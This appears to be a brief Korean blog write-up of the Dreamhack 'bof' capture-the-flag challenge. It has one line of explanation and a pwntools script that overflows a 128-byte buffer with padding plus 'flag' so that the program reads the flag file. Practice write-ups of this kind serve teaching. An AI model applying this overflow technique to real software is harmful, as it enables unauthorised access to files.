-
dreamhack - bofSystem 2024. 6. 24. 21:58
v4에 넣어서 read_cat의 a1값에 읽을 데이터를 넣어야함
from pwn import * p = process("./bof") p = remote("host3.dreamhack.games", 10055) p.sendline("A"*128+"flag") p.interactive()
'System' 카테고리의 다른 글
Ad점검스크립트 (0) 2023.03.06 nactf- bufover-1 (0) 2019.09.25 Buffer Overflow 기초-Memory(1) (0) 2019.04.15